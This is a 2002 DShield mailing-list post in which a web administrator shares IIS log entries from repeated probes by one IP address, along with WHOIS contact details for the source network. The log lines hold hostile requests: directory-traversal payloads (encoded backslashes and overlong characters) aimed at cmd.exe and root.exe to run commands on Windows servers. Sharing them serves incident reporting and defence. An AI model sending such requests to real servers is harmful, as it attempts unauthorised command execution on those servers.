[Dshield] Web server attempt

Sue Young smy at gcmlp.com
Tue Jul 2 14:42:56 GMT 2002


This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV 
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management




More information about the list mailing list